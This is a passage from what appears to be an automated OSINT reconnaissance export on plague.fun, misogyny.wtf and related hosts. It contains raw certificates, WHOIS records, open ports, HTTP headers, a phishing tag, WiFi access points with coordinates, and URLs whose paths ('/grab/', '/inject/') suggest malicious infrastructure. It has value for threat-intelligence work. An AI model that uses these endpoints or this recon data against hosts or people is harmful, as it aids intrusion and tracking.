D2:0D:67:35:38:EF:6A:3B:4A:2F:E7:A1:89:80:E8:46:87:08:00:70 X509v3 Authority Key Identifier: keyid:A8:4A:6A:63:04:7D:DD:BA:E6:D1:39:B7:A6:45:65:EF:F3:A8:EC:A1 Authority Information Access: OCSP - URI:http://ocsp.int-x3.letsencrypt.org CA Issuers - URI:http://cert.int-x3.letsencrypt.org/ X509v3 Subject Alternative Name: DNS:plague.fun, DNS:www.plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 0e:22:1f:09:1d:3d:f2:a6:56:13:ca:71:a1:f1:df:01:e3:a6: 3f:9c:32:18:33:9a:9e:03:e1:03:75:5d:71:67:87:df:6d:e2: 43:6a:57:fe:b2:07:45:21:a4:be:24:e4:56:c4:a2:eb:a5:14: 4b:4a:63:6b:c6:27:28:30:97:f4:e1:f0:5f:cf:bf:12:44:53: 42:30:cb:bb:0e:c2:5e:6b:8e:5b:df:55:04:97:7b:33:7b:bc: a1:a9:7e:3d:26:d0:78:09:75:c3:08:0b:87:0f:93:53:31:2a: c0:3a:fa:9d:58:f0:22:ac:3e:92:f3:5f:60:6e:cd:84:23:0d: 5f:08:3b:42:63:af:f2:fd:4f:00:83:40:87:55:e9:b4:39:a1: 79:89:fd:fa:e2:ce:06:03:d9:e8:f9:c5:e3:5c:75:c1:2c:23: 7e:f2:fb:cf:ab:27:08:74:52:95:dd:ab:31:8b:30:8c:d2:ea: 0c:9c:98:c9:31:56:59:24:78:61:c5:53:eb:ef:10:f7:89:3e: be:f1:1d:56:6f:34:5d:cb:20:69:ea:f4:3c:21:6e:5b:da:3a: 43:b4:e9:b4:7f:c5:f0:d4:09:90:0b:0d:60:98:7e:6a:39:5f: be:15:9f:d9:08:8f:c9:7a:3c:38:73:bf:7d:1c:46:33:0c:33: 74:8b:ba:1c 2022-12-18 00:03:22 Internet Name - Unresolved No DNS Resolver 0 0 2 0 None www.plague.fun Certificate: Data: Version: 3 (0x2) Serial Number: 03:d8:e8:f9:6e:af:5c:60:20:62:8a:c9:01:2c:b1:dd:b1:ef Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3 Validity Not Before: Aug 27 16:08:50 2020 GMT Not After : Nov 25 16:08:50 2020 GMT Subject: CN=www.plague.fun Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:a4:9b:a5:f9:88:bf:e3:84:c3:a7:20:d1:1a:68: 2a:3d:5d:5c:4b:72:46:33:3f:80:e8:7a:45:73:6a: cd:07:c0:56:2b:61:7f:4c:56:dd:e0:bd:ef:24:8e: 
E6:57:7C:57:94:B7:6A:EE:BC:61:3A:1A:69:D3:A2:1C Timestamp : Aug 27 17:08:51.044 2020 GMT Extensions: none Signature : ecdsa-with-SHA256 30:44:02:20:52:4E:25:21:1E:5A:C7:E2:2D:08:B5:85: 4F:11:22:CF:31:4E:D7:0A:D1:72:EC:DB:B6:13:1A:38: F4:4C:29:AD:02:20:78:1F:9F:EE:99:31:D2:F8:4D:00: 78:EA:12:77:C5:F9:6B:D0:BF:36:08:19:4D:15:F1:F5: 55:7A:C1:E9:C8:4C Signature Algorithm: sha256WithRSAEncryption 85:d6:5e:fe:7a:81:62:58:24:6d:26:a2:ae:e6:1d:8e:3e:ba: ae:26:4e:ba:0d:85:7c:95:f0:bc:55:f1:87:5e:67:bb:5f:e1: e4:26:28:75:34:87:50:e0:1b:62:3a:4b:eb:c8:bd:8f:50:e4: 53:a4:ac:3f:f9:38:25:0e:15:6b:4f:c7:67:d3:fa:70:c7:d8: e6:29:7c:90:6f:27:66:e9:f5:0e:bb:c0:37:3f:d6:f0:3e:21: 9e:b0:b8:76:26:54:83:8a:fe:90:49:ef:2a:f3:e5:68:ce:60: 8c:10:ba:5d:dd:97:0c:38:c5:44:72:66:52:e5:2b:15:82:2c: a8:ff:00:cf:13:af:d8:85:8e:b7:94:56:b9:3c:50:fb:4b:f3: f4:b1:1b:02:ac:11:cf:97:e8:b0:9f:b1:4b:e0:25:83:48:5e: 84:aa:e8:fa:27:7b:6e:2c:d0:98:82:40:a3:d9:c9:8a:54:15: 92:ed:13:d9:2d:d1:43:51:24:33:9e:a2:27:0c:d2:80:1e:c6: 07:b5:84:f5:6c:f3:78:7a:e5:6f:f7:bd:ab:4c:36:29:44:d0: 99:8c:64:14:17:e8:e9:72:22:0b:02:b5:cc:61:4e:62:b2:15: 5b:7e:aa:29:5e:33:6d:cc:4c:4b:ad:d7:24:75:0b:37:e1:8b: 0d:4e:40:4d 2022-12-18 00:21:02 Open TCP Port No Censys 0 0 2 0 None 104.21.28.240:2082 104.21.28.240 2022-12-18 00:20:19 BGP AS Membership No RIPE 0 0 4 0 None 12363 195.110.124.0/24 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None 7717 7361 (Net ID: 00:00:C5:FC:FE:34) 37.7803446,-122.3906132 2022-12-18 00:21:06 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.147.230 2022-12-18 00:21:20 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["151"], "_encoding": {"Content_Length": 
"DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Cf_Ray": ["77afa301383c2a6c-ORD"]} 188.114.97.1 2022-12-18 00:09:33 Open TCP Port No LeakIX 0 0 2 0 None 104.21.27.242:443 104.21.27.242 2022-12-18 00:08:40 BGP AS Membership No RIPE 0 0 3 0 None 3215 90.116.0.0/16 2022-12-18 00:21:10 WiFi Access Point Nearby No Wigle.net 0 0 5 0 None dvdbeyond (Net ID: 00:01:24:F2:B3:12) 37.7803446,-122.3906132 2022-12-18 00:08:16 Netblock Membership No RIPE 0 0 1 0 None 20.192.0.0/10 20.224.2.213 2022-12-18 00:21:51 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 172.67.137.37 2022-12-18 00:26:18 Physical Location No MetaDefender 0 0 2 0 None Campinas, Brazil 20.226.56.97 2022-12-18 00:21:13 BGP AS Membership No Censys 0 0 2 0 None 13335 188.114.97.0 2022-12-18 00:13:36 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None abuse@cloudflare.com {u'asn_registry': u'arin', u'country_code': u'US', u'classification': u'whitelist', u'asn_country_code': u'US', u'is_open_proxy': False, u'creation_time': u'2022-06-23 00:42:25', u'asn_date': u'2015-02-25 00:00:00', u'tag': [u'phishing'], u'postal_code': u'94107', u'is_mining_pool': False, u'ip_addr': u'172.67.137.37', u'number_of_offline_malicious_urls_allocated': 0, u'registrant_name': u'Cloudflare, Inc.', u'city': u'San Francisco', u'last_updated': u'2021-05-26 00:00:00', u'number_of_online_malicious_urls_allocated': 0, u'number_of_whitelisted_domains_resolving': 0, u'state': u'CA', u'is_known_scanner': False, 
u'location': {u'lat': 37.751, u'lon': -97.822}, u'type': u'ip', u'email': [u'abuse@cloudflare.com', u'noc@cloudflare.com', u'rir@cloudflare.com'], u'is_cnc': False, u'is_iot_threat': False, u'is_known_attacker': False, u'blacklist': [{u'count': 1, u'description': u'Phishing', u'labels': [u'compromised'], u'source': u'OpenPhish', u'first_seen': u'2022-06-23 00:42:25', u'last_seen': u'2022-06-24 12:40:18'}], u'modification_time': u'2022-10-03 13:47:50', u'asn_cidr': u'172.67.128.0/20', u'number_of_domains_resolving': 0, u'is_tor_node': False, u'address': u'101 Townsend Street', u'cidr': [u'172.64.0.0/13'], u'number_of_blacklisted_domains_resolving': 0, u'is_distributing_malware': False, u'is_sinkhole': False, u'is_hosting': False, u'is_cdn': True, u'as_name': u'AS13335 - Cloudflare, Inc.', u'is_vpn_node': False} 2022-12-18 00:11:10 Similar Domain - Whois No Whois 2 0 2 0 None %% %% This is the AFNIC Whois server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. 
%% domain: plague.fr status: ACTIVE eppstatus: active hold: NO holder-c: ANO00-FRNIC admin-c: ANO00-FRNIC tech-c: OVH5-FRNIC registrar: OVH Expiry Date: 2023-01-30T04:23:37Z created: 2014-01-30T04:23:37Z last-update: 2022-01-30T04:35:23Z source: FRNIC nserver: dns107.ovh.net nserver: ns107.ovh.net source: FRNIC key1-tag: 10120 key1-algo: 8 [RSASHA256] key1-dgst-t: 8 [SHA256] key1-dgst: 5BD52D51E250B4CC173D1D59D9A7F23891B3311873364A4F9B2B612EF4CDDD58 source: FRNIC registrar: OVH address: 2 Rue Kellermann address: 59100 ROUBAIX country: FR phone: +33.899701761 fax-no: +33.320200958 e-mail: support@ovh.net website: http://www.ovh.com anonymous: No registered: 1999-10-18T00:00:00Z source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: OVH changed: 2019-01-04T14:49:13Z anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: ANO00-FRNIC type: PERSON contact: Ano Nymous registrar: OVH anonymous: YES remarks: -------------- WARNING -------------- remarks: While the registrar knows him/her, remarks: this person chose to restrict access remarks: to his/her personal data. So PLEASE, remarks: don't send emails to Ano Nymous. This remarks: address is bogus and there is no hope remarks: of a reply. 
remarks: -------------- WARNING -------------- obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC nic-hdl: OVH5-FRNIC type: ORGANIZATION contact: OVH NET address: OVH address: 140, quai du Sartel address: 59100 Roubaix country: FR phone: +33.899701761 e-mail: tech@ovh.net registrar: OVH changed: 2022-12-17T20:33:44.519173Z anonymous: NO obsoleted: NO eppstatus: associated eppstatus: active eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:10.534955Z <<< plague.fr 2022-12-18 00:22:14 Open TCP Port No Censys 0 0 2 0 None 172.67.169.215:443 172.67.169.215 2022-12-18 00:22:07 BGP AS Membership No Censys 0 0 2 0 None 15169 34.149.204.188 2022-12-18 00:06:37 Open TCP Port No Pulsedive 0 0 2 0 None 188.114.96.1:8080 188.114.96.1 2022-12-18 00:03:08 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:54:d1:cf:73:f4:06:da:67:36:31:1b:04:19:11:b7:02:21 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:41:57 2022 GMT Not After : Jun 6 17:41:56 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:99:c4:36:4d:b6:7c:39:c2:f1:77:60:a8:ba:f8: 1c:59:3e:dd:96:42:44:67:b8:8b:49:69:58:1a:9d: ae:aa:d4:88:d9:2c:d6:c2:df:95:1d:df:ac:20:80: f6:6c:90:00:e7:ce:f6:99:5d:a6:86:c6:4c:71:e4: 0a:11:87:6e:9d ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 7C:C0:30:0A:42:D8:F4:C5:D8:B9:9F:B1:0D:6A:DF:8F:DE:76:96:BE X509v3 Authority Key Identifier: keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC Authority Information Access: OCSP - 
URI:http://e1.o.lencr.org CA Issuers - URI:http://e1.i.lencr.org/ X509v3 Subject Alternative Name: DNS:*.plague.fun, DNS:plague.fun X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 1.3.6.1.4.1.44947.1.1.1 CPS: http://cps.letsencrypt.org CT Precertificate Poison: critical NULL Signature Algorithm: ecdsa-with-SHA384 30:64:02:30:73:c9:51:81:24:54:60:50:42:94:ed:53:88:10: 89:96:e7:79:87:b5:b8:53:60:60:89:dc:82:36:ca:08:8a:16: 39:38:0a:9b:7a:23:19:6f:4f:5a:30:1f:e5:6c:76:40:02:30: 3d:be:52:da:80:dc:a2:9d:50:94:22:a3:e3:f8:29:ec:b0:25: 63:d5:de:74:71:c9:c1:71:0e:8c:0d:1d:3a:6e:b9:c4:0a:9e: 23:22:2b:9c:de:86:d5:f4:68:f3:3f:5b plague.fun 2022-12-18 00:21:47 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77b2ce24691b2ada-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 2606:4700:3032::ac43:8925 2022-12-18 00:13:15 Internet Name No DNS Brute-forcer 7 1 1 0 None autoconfig.zerotwo-best-waifu.online zerotwo-best-waifu.online 2022-12-18 00:04:00 Physical Location No ipstack 0 0 1 0 None Switzerland 51.103.210.236 2022-12-18 00:16:27 Co-Hosted Site No SSL Certificate Analyzer 0 0 2 0 None sni.cloudflaressl.com 188.114.97.9 2022-12-18 00:09:42 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.96.15:8443 188.114.96.0/24 2022-12-18 00:13:47 Affiliate - Email Address No E-Mail Address Extractor 0 0 3 0 None info@nettalk.nl %% %% This is the AFNIC Whois 
server. %% %% complete date format: YYYY-MM-DDThh:mm:ssZ %% %% Rights restricted by copyright. %% See https://www.afnic.fr/en/domain-names-and-support/everything-there-is-to-know-about-domain-names/find-a-domain-name-or-a-holder-using-whois/ %% %% Use '-h' option to obtain more information about this service. %% domain: rasputin.fr status: ACTIVE eppstatus: active hold: NO holder-c: DA10525-FRNIC admin-c: DA10525-FRNIC tech-c: DA10525-FRNIC registrar: SONEXO B.V Expiry Date: 2023-08-06T23:33:00Z created: 2018-08-06T23:33:00Z last-update: 2022-08-06T23:35:46Z source: FRNIC nserver: ns1.sonexo.eu nserver: ns2.sonexo.com source: FRNIC key1-tag: 581 key1-algo: 8 [RSASHA256] key1-dgst-t: 8 [SHA256] key1-dgst: 4941121364626216209F295028F9A30785FE7E5C365AF39EB6A093CD2AF41311 source: FRNIC registrar: SONEXO B.V address: Edeseweg 52 - address: 6721 JX Bennekom country: NL phone: +31.308200291 fax-no: +31.302711470 e-mail: info@sonexo.nl website: http://www.sonexo.nl anonymous: No registered: 2014-04-21T00:00:00Z source: FRNIC nic-hdl: DA10525-FRNIC type: ORGANIZATION contact: NetTalk address: NetTalk address: Postbus 447 address: 6710BK Ede country: NL phone: +31.850160612 fax-no: +31.850160613 e-mail: info@nettalk.nl registrar: SONEXO B.V changed: 2017-02-25T15:15:13Z anonymous: NO obsoleted: NO eppstatus: serverUpdateProhibited eppstatus: associated eligstatus: not identified reachstatus: not identified source: FRNIC >>> WHOIS request date: 2022-12-18T00:11:07.072571Z <<< 2022-12-18 00:18:35 Open TCP Port No Pulsedive 0 0 3 0 None 188.114.97.15:443 188.114.97.0/24 2022-12-18 00:26:11 Physical Location No MetaDefender 0 0 2 0 None Campinas, Brazil 20.226.83.185 2022-12-18 00:21:13 Open TCP Port No Censys 0 0 2 0 None 188.114.97.0:2087 188.114.97.0 2022-12-18 00:08:42 Open TCP Port No LeakIX 0 0 1 0 None 51.103.210.236:80 51.103.210.236 2022-12-18 00:12:31 URL (Purely Static) No Page Information 0 0 3 0 None http://misogyny.wtf/grab/UsRjS959Rqm4sPG4 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

2022-12-18 00:22:14 HTTP Headers No Censys 0 0 2 0 None {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["77a9199eebd6218b-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": [""], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} 172.67.169.215 2022-12-18 00:21:37 Open TCP Port No Censys 0 1 2 0 None 20.226.83.185:3389 20.226.83.185 2022-12-18 00:21:02 HTTP Headers No Censys 0 0 2 0 None {"Content_Length": ["253"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Date": [""], "Connection": ["close"], "Content_Type": ["text/html"], "Cf_Ray": ["-"]} 104.21.28.240 2022-12-18 00:09:39 Co-Hosted Site No HackerTarget 0 0 2 0 None 733rr.com 172.67.147.230 2022-12-18 00:04:01 Physical Location No ipstack 0 0 2 0 None Colombia 188.114.96.0 2022-12-18 00:14:36 HTTP Status Code No Web Spider 0 0 2 0 None None http://misogyny.wtf:1337/inject/UsRjS959Rqm4sPG4/ 2022-12-18 00:24:06 Affiliate - Email Address No E-Mail Address Extractor 0 0 5 0 None abuse@register.it Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://www.register.it Updated Date: 2022-01-13T08:14:30Z Creation Date: 2010-01-12T13:36:45Z Registry Expiry Date: 2023-01-12T13:36:45Z Registrar: Register SPA Registrar IANA ID: 168 Registrar Abuse Contact 
Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/ >>> Last update of whois database: 2022-12-18T00:22:01Z <<< For more information on Whois status codes, please visit https://icann.org/epp NOTICE: The expiration date displayed in this record is the date the registrar's sponsorship of the domain name registration in the registry is currently set to expire. This date does not necessarily reflect the expiration date of the domain name registrant's agreement with the sponsoring registrar. Users may consult the sponsoring registrar's Whois database to view the registrar's reported date of expiration for this registration. TERMS OF USE: You are not authorized to access or query our Whois database through the use of electronic processes that are high-volume and automated except as reasonably necessary to register domain names or modify existing registrations; the Data in VeriSign Global Registry Services' ("VeriSign") Whois database is provided by VeriSign for information purposes only, and to assist persons in obtaining information about or related to a domain name registration record. VeriSign does not guarantee its accuracy. 
By submitting a Whois query, you agree to abide by the following terms of use: You agree that you may use this Data only for lawful purposes and that under no circumstances will you use this Data to: (1) allow, enable, or otherwise support the transmission of mass unsolicited, commercial advertising or solicitations via e-mail, telephone, or facsimile; or (2) enable high volume, automated, electronic processes that apply to VeriSign (or its computer systems). The compilation, repackaging, dissemination or other use of this Data is expressly prohibited without the prior written consent of VeriSign. You agree not to use electronic processes that are automated and high-volume to access or query the Whois database except as reasonably necessary to register domain names or modify existing registrations. VeriSign reserves the right to restrict your access to the Whois database in its sole discretion to ensure operational stability. VeriSign may restrict or terminate your access to the Whois database for failure to abide by these terms of use. VeriSign reserves the right to modify these terms at any time. The Registry database contains ONLY .COM, .NET, .EDU domains and Registrars. Domain Name: SETUPDNS.NET Registry Domain ID: 1581585796_DOMAIN_NET-VRSN Registrar WHOIS Server: whois.register.it Registrar URL: http://we.register.it Updated Date: 2022-02-14T00:00:00Z Creation Date: 2010-01-12T00:00:00Z Registrar Registration Expiration Date: 2023-01-12T00:00:00Z Registrar: REGISTER S.P.A. 
Registrar IANA ID: 168 Registrar Abuse Contact Email: abuse@register.it Registrar Abuse Contact Phone: +39.05520021555 Reseller: Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited Registry Registrant ID: Registrant Name: Global Domain Privacy Registrant Organization: GLOBAL DOMAIN PRIVACY Registrant Street: Via Zanchi 22 Registrant City: Bergamo Registrant State/Province: BG Registrant Postal Code: 24126 Registrant Country: IT Registrant Phone: +39.353230400 Registrant Phone Ext: Registrant Fax: +39.353230312 Registrant Fax Ext: Registrant Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Admin ID: Admin Name: Global Domain Privacy Admin Organization: GLOBAL DOMAIN PRIVACY Admin Street: Via Zanchi 22 Admin City: Bergamo Admin State/Province: BG Admin Postal Code: 24126 Admin Country: IT Admin Phone: +39.353230400 Admin Phone Ext: Admin Fax: +39.353230312 Admin Fax Ext: Admin Email: z22lglbqy5igu1vav@registerprivateregistration.com Registry Tech ID: Tech Name: Global Domain Privacy Tech Organization: GLOBAL DOMAIN PRIVACY Tech Street: Via Zanchi 22 Tech City: Bergamo Tech State/Province: BG Tech Postal Code: 24126 Tech Country: IT Tech Phone: +39.353230400 Tech Phone Ext: Tech Fax: +39.353230312 Tech Fax Ext: Tech Email: private@register.it Name Server: NS1.REGISTER.IT Name Server: NS2.REGISTER.IT DNSSEC: unsigned URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/ >>> Last update of whois database: 2022-12-18T00:22:21Z <<< For more information on Whois status codes, please visit https://icann.org/epp 2022-12-18 00:07:17 Web Content No Web Spider 2 0 2 0 None 403 Forbidden

Forbidden

You don't have the permission to access the requested resource. It is either read-protected or not readable by the server.

http://misogyny.wtf/inject/UsRjS959Rqm4sPG4 2022-12-18 00:08:41 Internet Name No DNS Resolver 0 0 2 0 None misogyny.wtf Certificate: Data: Version: 3 (0x2) Serial Number: 39:2f:d3:a5:c8:f5:ab:d1:13:70:69:a5:1d:f6:ba:07 Signature Algorithm: sha256WithRSAEncryption Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 Validity Not Before: Jul 23 20:45:10 2022 GMT Not After : Oct 21 20:45:09 2022 GMT Subject: CN=*.misogyny.wtf Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public-Key: (2048 bit) Modulus: 00:dd:77:38:dd:67:be:04:81:c0:b1:0d:6f:43:99: 17:1b:56:53:b9:17:af:64:3b:db:00:b5:b8:7c:25: 11:ca:e7:8a:7b:2f:0a:f4:97:d7:26:7a:4e:9d:27: 18:8a:ce:26:eb:6f:60:61:e7:f3:23:c3:fe:48:ac: f5:31:17:09:86:85:51:e5:0c:19:9e:49:1c:67:5e: 65:fb:75:4f:9d:9c:e4:00:bf:2e:75:c8:46:18:09: 3e:b8:93:7f:88:dd:aa:a0:2d:94:64:7f:46:c7:ef: 20:52:0d:91:c5:b8:36:52:e0:aa:42:16:8d:e4:45: ca:05:9f:06:1f:3f:47:0e:cd:b3:fb:c9:74:c8:8f: 79:44:2f:2a:f3:fd:c1:97:15:f3:c5:37:82:ff:7c: 2e:b3:71:5d:47:f2:c2:4b:28:a6:60:ca:18:57:3f: 26:b0:f7:a5:ee:2c:59:15:a2:04:f0:95:0e:98:e4: 8a:f7:33:0f:bb:31:08:43:47:16:7c:60:32:0f:95: fa:20:5b:b8:eb:f5:84:bf:e7:94:a6:24:35:89:97: 88:ac:0f:3d:69:c4:26:dd:dc:b4:1b:96:22:d0:0b: dc:56:6f:34:6e:a2:18:0b:b8:cc:59:6d:20:5b:58: e9:6c:0c:a6:d1:d6:fd:0a:2b:f1:a1:bd:2b:df:eb: 4f:a3 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Key Usage: critical Digital Signature, Key Encipherment X509v3 Extended Key Usage: TLS Web Server Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: D2:5E:32:54:AB:C0:23:7F:D8:B8:85:A9:49:B2:9E:58:78:A0:55:DB X509v3 Authority Key Identifier: keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8 Authority Information Access: OCSP - URI:http://ocsp.pki.goog/s/gts1p5/cwPali_UwUM CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der X509v3 Subject Alternative Name: DNS:*.misogyny.wtf, DNS:misogyny.wtf X509v3 Certificate Policies: Policy: 2.23.140.1.2.1 Policy: 
1.3.6.1.4.1.11129.2.5.3 X509v3 CRL Distribution Points: Full Name: URI:http://crls.pki.goog/gts1p5/PkkZg3aqgvc.crl CT Precertificate Poison: critical NULL Signature Algorithm: sha256WithRSAEncryption 57:8b:bf:21:ca:42:95:a1:0d:34:b5:22:26:6f:5f:e2:0f:91: 1f:62:c8:df:fb:6d:23:b7:a5:bf:18:3f:74:fb:25:f4:39:12: 06:e0:16:6e:a3:fa:de:ff:5c:e7:d9:9e:b3:ef:e9:e1:04:e2: 82:07:79:0f:92:d9:4f:78:b2:02:be:a5:07:87:f4:f5:f1:ae: 40:04:dd:38:56:32:60:2a:07:21:8e:0d:ad:a5:c5:ba:ad:a8: ff:50:68:22:d6:63:23:da:4c:27:34:b2:fc:06:07:c5:f2:7f: 4c:58:57:af:76:7a:02:b9:ed:e0:62:8e:6a:b5:97:a0:26:8f: 9f:6f:24:3a:a9:2c:02:35:03:0f:62:3e:db:eb:56:47:2a:de: ab:4a:db:7e:1d:40:17:d1:e1:e5:bd:a3:49:ca:bb:8c:7b:4d: de:a1:83:db:94:ba:35:a6:60:ea:39:8d:e6:4f:a6:9a:1a:a7: 35:cf:b9:40:bc:e5:1b:22:b4:47:71:66:dd:77:72:8b:34:aa: 48:32:67:4b:68:b0:41:19:7b:2c:3c:ce:a5:4d:df:f5:6c:a9: 7b:16:1e:8a:78:47:11:e8:a6:96:12:66:84:5f:ce:cc:51:3a: fc:6e:5c:8c:2b:a4:40:cb:8a:ba:0b:50:b8:cf:4a:0d:c6:18: 48:f4:35:0b 2022-12-18 00:04:36 SSL Certificate - Raw Data No Certificate Transparency 1 0 1 0 None Certificate: Data: Version: 3 (0x2) Serial Number: 04:43:e4:fc:51:db:21:42:a6:26:a1:af:57:d7:7c:1f:09:d4 Signature Algorithm: ecdsa-with-SHA384 Issuer: C=US, O=Let's Encrypt, CN=E1 Validity Not Before: Mar 8 17:39:27 2022 GMT Not After : Jun 6 17:39:26 2022 GMT Subject: CN=*.plague.fun Subject Public Key Info: Public Key Algorithm: id-ecPublicKey Public-Key: (256 bit) pub: 04:63:06:0d:b4:4b:4a:57:30:47:e6:68:c4:a0:06: e4:58:1f:c8:0e:38:75:86:1e:73:96:2c:89:c8:ec: 31:ce:7c:ee:7b:5d:74:75:c9:dc:a4:c6:8f:c0:3b: 27:88:0b:98:a2:b9:e4:84:96:c4:e0:e1:7d:26:c6: 1c:f1:97:8d:a0 ASN1 OID: prime256v1 NIST CURVE: P-256 X509v3 extensions: X509v3 Key Usage: critical Digital Signature X509v3 Extended Key Usage: TLS Web Server Authentication, TLS Web Client Authentication X509v3 Basic Constraints: critical CA:FALSE X509v3 Subject Key Identifier: 63:2A:32:F5:F5:82:2C:C6:1C:1E:DA:47:97:C6:17:4B:A9:C9:45:6A X509v3 Authority Key 
